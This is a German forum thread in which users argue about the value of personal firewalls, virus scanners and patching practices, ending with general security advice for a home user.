Genau, und deshalb patchen sie nur dann sofort, wenn es sich umgehen lÀsst.
DarĂŒber hinaus gibt es dann diverse Mechanismen, Patches automatisiert auf die
Maschinen zu bringen. Admins schĂŒtzen ihre Netze mit anderen Mitteln als die
Anwender zu Hause. Ich weià es zufÀlligerweise, weil ich beides bin.
Wie gesagt, mancher Surfer macht sich da nicht so viele
Gedanken oder er hat keine Lust, sich Gedanen zu machen.
Genau da liegt das Problem. Niemand hat Lust, sich irgendwelche Gedanken zu
machen und alle anderen baden es aus. Und eine Personal Firewall ist
schlichtweg nix, worĂŒber man sich keine Gedanken machen muss - im gegenteil.
Glaubst du wirklich, dass die Dinger auch nur einen Funken nĂŒtzen, wenn der
Anwender nicht in der Lage ist (oder ĂŒberhaupt willens ist), sich damit
auseinanderzusetzen?
Wenn die Leute es nich bedienen können, oder es nicht wollen, oder es nicht
können wollen, dann helfen diese Dinge:
- buy an administrator oder
- buy a Mac.
Beides hilft richtig. Aber solange Geiz in diesem Land geil ist, wird sich am
Problem der Anwender nichts Àndern, und sie werden ihre Lage mit Personal
Firewalls noch verschlimmbessern.
Was Virenscanner angeht stehe ich auf der anderen Seite der Expertenmeinungen
hier im Forum und empfehle die Dinger sogar (auch wenn ich selber keinen
benutze, aber ich benutze ja auch kein Windows). ZUmindest kann man damit einen
Haufen Kroppzeugs ausfiltern - wenn der Scanner up-to-date ist (und meistens
ist er das ja nicht).
Mancher will einfach nur surfen und sich nicht durch unĂŒbersichtliche
FAQ quÀlen.
Das wollen wir alle. Ich machs sogar stÀndig so.
Ich habe bereits Tests von Firewalls in der âComputer-Bildâ
In was?
Stefan
hi!
Mir ist sehr wohl klar, dass die AktualitÀt der Software
wichtig ist, aber du glaubst doch nicht im Ernst, dass
irgendwo in einem Rechnerverbund mit hunderten von Rechnern
sofort nach dem Erscheinen auf jedem einzelnen das Patch
installiert wird. Die Admins wÀren doch dann nur noch mit der
Installation der Patches beschÀftigt.
nö, eigentlich nicht, daĂ geht komplett automatisch, da gibtâs von microsoft sogar den sus âŠ
Wie gesagt, mancher Surfer macht sich da nicht so viele
Gedanken oder er hat keine Lust, sich Gedanen zu machen. Dem
hilft die Software.
sobald ich also zone-alarm, norton i-net-security o.Ă€. installiert habe, kann ich also wie wild drauflosklicken???
Was ist denn dabei? Es sind doch meine
Ressourcen, die sie verbraucht!
und mich mit spam-/viren-/etc.-mails vollmĂŒllt, die ich mit meiner bandbreite, fĂŒr die ich zahle, runterladen muĂ
Ich bin kein Administrator und kann nicht beurteilen, wie es
dazu kam und ob der Virus nicht etwa mit einer Fremd-CD-ROM
eingeschleppt wurde.
das wĂ€re dann eigentlich noch schlimmer!!! schmeiĂt eure admins raus!
Okay, die Sicherheit ist niemals komplett, aber die Firewall
verhindert wenigstens einen Teil der Angriffsversuche
âganz komisch bösartiger ping wollte in das system eindringenâ - klingt Ă€uĂerst gefĂ€hrlich âŠ
Nicht jeder hat Lust und Zeit, sich
die Grundlagen der IT-Sicherheit reinzutun. Mancher will
einfach nur surfen und sich nicht durch unĂŒbersichtliche FAQ
quÀlen.
und dafĂŒr gibtâs spezialisten - oder machst du bei deinem auto das service/den tĂŒv/das âpickerlâ selber?
Ich habe bereits Tests von Firewalls in der âComputer-Bildâ [âŠ] gelesen
diese aussage wurde wohl schon genug kommentiert âŠ
grĂŒĂe und viele pings an deine pf
tomh
Was Virenscanner angeht stehe ich auf der anderen Seite der
Expertenmeinungen
hier im Forum und empfehle die Dinger sogar (auch wenn ich
selber keinen
benutze, aber ich benutze ja auch kein Windows). ZUmindest
kann man damit einen
Haufen Kroppzeugs ausfiltern - wenn der Scanner up-to-date ist
(und meistens
ist er das ja nicht).
Nunja. Virenscanner (VS) sind zumindet sehr nĂŒtzlich, um einem zu sagen, wie der Virus heisst, den man gerade zugeschickt bekommen hat. Gut, manchmal weiss erâs nicht, aber spĂ€testens am nĂ€chsten Tag hat er dann den Namen.
Und auf einem MTA als automatisierter Vorfilter können sie einem einen Haufen lÀstigen Traffic ersparen.
Empfehlenswert ist so ein VS, keine Frage. Nur die Annahme vieler User, ein VS könne sie vor Viren schĂŒtzen, die entbehrt leider jeder Grundlage.
Gruss
Schorsch
Bevor ihr euch alle auf den einen Sturz könnt ihr mir doch lieber sagen, wie es richtig gemacht wird! Brauche ich ne zusĂ€tzliche Firewall auf meinen 2. (Haupt-) Rechner, der nur zum surfen ist, oder nicht)? Welche altanativen hĂ€tte ich? Wenn ein Router hier helfen wĂŒrde, welcher ist da am besten geeignet? Gibts auch interne Router, sprich welche, die man in einen PC einbauen kann(Egal wie)?
THX
hi!
wurde ca. 120394875 mal erwÀhnt:
- system und virenscanner auf dem aktuellsten stand halten (am besten mit automatischen update-job)
- http://www.dingens.org/
- nicht gerade mit administrator-rechten surfen - je weniger rechte, um so besser
- lesen - denken - âokâ oder âabbrechenâ klicken
grĂŒĂe,
tomh